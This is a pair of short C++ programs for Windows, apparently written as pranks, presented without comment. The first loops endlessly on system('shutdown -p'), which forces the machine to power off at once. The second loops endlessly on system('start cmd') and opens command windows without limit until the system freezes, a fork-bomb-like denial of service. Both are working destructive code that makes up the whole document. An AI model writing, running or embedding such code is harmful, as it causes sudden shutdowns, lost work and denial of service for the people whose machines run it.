#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
signed main(){
ios::sync_with_stdio(false);cin.tie(NULL);cout.tie(NULL);
while(true){
system("shutdown -p");
}
return 0;
}
#include <bits/stdc++.h>
using namespace std;
int main(){
while(true){
system("start cmd");
}
return 0;
}